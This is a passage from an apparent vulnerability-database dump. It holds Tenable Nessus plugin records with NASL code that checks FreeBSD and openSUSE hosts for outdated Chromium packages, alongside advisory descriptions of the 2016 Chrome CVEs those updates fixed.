script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<52.0.2743.82\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<52.0.2743.82\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<52.0.2743.82\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:17:01", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives", "cvss3": {}, "published": "2016-07-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-901)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-901.NASL", "href": "https://www.tenable.com/plugins/nessus/92551", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-901.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92551);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-901)\");\n script_summary(english:\"Check for the openSUSE-2016-901 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 52.0.2743.82 to fix the following security\nissues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service\n Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits,\n fuzzing and other initiatives\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=989901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"chromium-debuginfo-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"chromium-debugsource-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"chromium-ffmpegsumo-debuginfo-52.0.2743.82-111.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromium / chromium-desktop-gnome / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:10", "description": "The specific version of Chrome that the system is running is reportedly affected by the following vulnerabilities:\n\n- Google Chrome contains a flaw in PPAPI that is triggered when handling certain messages not sent by the browser in the plugin broker process. This may allow a context-dependent attacker to bypass the sandbox. (CVE-2016-1706)\n\n- Google Chrome for iOS contains a flaw in web/web_state/ui/crw_web_controller.mm that is triggered when handling invalid URLs. This may allow a context-dependent attacker to conduct URL spoofing attacks. (CVE-2016-1707)\n\n- Google Chrome contains a use-after-free error related to extensions that may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code.\n (CVE-2016-1708)\n\n- Google sfntly contains an array indexing error in the ByteArray::Get() function in data/byte_array.cc that is triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to cause a heap-based buffer overflow, crashing a process linked against the library or potentially allowing the execution of arbitrary code. (CVE-2016-1709)\n\n- Google Chrome contains a flaw in web/ChromeClientImpl.cpp that is triggered when handling creation of new windows by deferred frames. This may allow a context-dependent attacker to bypass the same-origin policy. (CVE-2016-1710)\n\n- Google Chrome contains a flaw in core/loader/FrameLoader.cpp that is triggered when handling frame navigations during DocumentLoader detach. This may allow a context-dependent attacker to bypass the same-origin policy. (CVE-2016-1711)\n\n- Google Chrome contains a use-after-free error in the previousLinePosition() function in core/editing/VisibleUnits.cpp. This may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. (CVE-2016-5127)\n\n- Google V8 contains an unspecified flaw which may allow a context-dependent attacker to bypass the same-origin policy. No further details have been provided by the vendor. (CVE-2016-5128)\n\n- Google V8 contains a flaw that is triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to corrupt memory and cause a denial of service in a process linked against the library or potentially execute arbitrary code. (CVE-2016-5129)\n\n- Google Chrome contains a flaw in the HistoryController::UpdateForCommit() function in content/renderer/history_controller.cc. The issue is triggered when handling two forward navigations that compete in different frames. This may allow a context-dependent attacker to perform URL spoofing attacks. (CVE-2016-5130)\n\n- Libxml2 contains a use-after-free error in the xmlXPtrRangeToFunction() function in xpointer.c. This may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. (CVE-2016-5131)\n\n- Google Chrome contains a flaw related to Service Workers that is triggered when handling subframes of an insecure context. This may allow a context-dependent attacker to perform a limited bypass of the same-origin policy. (CVE-2016-5132)\n\n- Google Chrome contains a flaw related to proxy authentication that is triggere when handling origins. This may allow a context-dependent attacker to spoof the proxy server origin. (CVE-2016-5133)\n\n- Google Chrome contains a flaw that is triggered as https:// URLs are not properly sanitized before being sent to PAC scripts. This may allow a context-dependent attacker to leak URLs. (CVE-2016-5134)\n\n- Google Chrome contains a flaw in html/parser/HTMLPreloadScanner.cpp related to the handling of referrer policies. This may allow a context-dependent attacker to bypass the content security policy (CSP). (CVE-2016-5135)\n\n- Google Chrome contains a use-after-free error in extensions/renderer/user_script_injector.cc that is triggered when handling UserScript pointers. This may allow a malicious extension to dereference already freed memory and potentially execute arbitrary code with elevated privileges. (CVE-2016-5136)\n\n- Google Chrome contains a flaw in the CSPSource::portMatches() function in frame/csp/CSPSource.cpp related to HSTS and CSP when handling HTTP vs HTTPS ports in source expressions. This may allow a context-dependent attacker to disclose browsing history information. (CVE-2016-5137)\n\n- Google Chrome contains a flaw in the LayoutBox::removeFloatingOrPositionedChildFromBlockLists() function in core/layout/LayoutBox.cpp that is triggered when handling LayoutView floats. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in the Resource::canUseCacheValidator() function in core/fetch/Resource.cpp that is triggered when revalidating Resource with redirects. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in the Resource::willFollowRedirect() function in core/fetch/Resource.cpp that is triggered when handling redirect responses while revalidating resources. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in net/url_request/sdch_dictionary_fetcher.cc that is triggered when handling dictionary requests failing after receiving data. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in the ShapeResultSpacing::computeSpacing() function in platform/fonts/shaping/ShapeResultSpacing.cpp that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in the Channel::Message::Deserialize() function in mojo/edk/system/channel.cc that is triggered when handling header sizes in channel messages. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2016-1705)\n\n- Google Chrome contains an unspecified flaw in Font::individualCharacterRanges() function in platform/fonts/Font.cpp, which may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google WebRTC contains an out-of-bounds read flaw in the WebRtcIsacfix_PitchFilter() and WebRtcIsacfix_PitchFilterGains() functions in modules/audio_coding/codecs/isac/fix/source/pitch_filter.c that may allow a context-dependent attacker to crash a process linked against the library or potentially disclose memory contents. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in org/chromium/chrome/browser/toolbar/CustomTabToolbarAnimationDelegate.java that is due to the program failing to properly load security icons on custom HTTP connection tabs. This may allow a context-dependent attacker to spoof valid icons. (CVE-2016-1705)\n\n- Google Skia contains an integer overflow condition in the SkLinearGradient::LinearGradientContext::shade4_dx_clamp() function in effects/gradients/SkLinearGradient.cpp . The issue is triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- libvpx contains an invalid read flaw in the setup_frame_size_with_refs() function in vp9/decoder/vp9_decodeframe.c that may allow a context-dependent attacker to crash a process linked against the library or potentially disclose memory contents.\n\n- Google Chrome contains an unspecified flaw in extensions that is triggered during the handling of NativeMessaging IDs. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google Chrome contains an out-of-bounds read flaw in the HTMLMenuItemElement::defaultEventHandler() function in core/html/HTMLMenuItemElement.cpp that may allow a context-dependent attacker to potentially disclose memory contents. (CVE-2016-1705)\n\n- Google Chrome contains an unspecified flaw in the GURL::ReplaceComponents() function in url/gurl.cc that is triggered during inner URL creation. This may allow a context-dependent attacker to have an unspecified impact. No further details have been provided. (CVE-2016-1705)\n\n- Google V8 contains an unspecified flaw that may allow a context-dependent attacker to have an unspecified impact. No further details have been provided by the vendor. (CVE-2016-1705)", "cvss3": {}, "published": "2016-09-06T00:00:00", "type": "nessus", "title": "Chrome < 52.0.2743.82 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-09-06T00:00:00", "cpe": [], "id": "802027.PRM", "href": "https://www.tenable.com/plugins/lce/802027", "sourceData": "Binary data 802027.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:52", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives", "cvss3": {}, "published": "2016-08-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-919.NASL", "href": "https://www.tenable.com/plugins/nessus/92655", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-919.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92655);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-919)\");\n script_summary(english:\"Check for the openSUSE-2016-919 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 52.0.2743.82 to fix the following security\nissues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service\n Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits,\n fuzzing and other initiatives\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=989901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-52.0.2743.82-150.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:50", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives", "cvss3": {}, "published": "2016-07-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-900)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "cpe:/o:novell:opensuse:42.1"], "id": 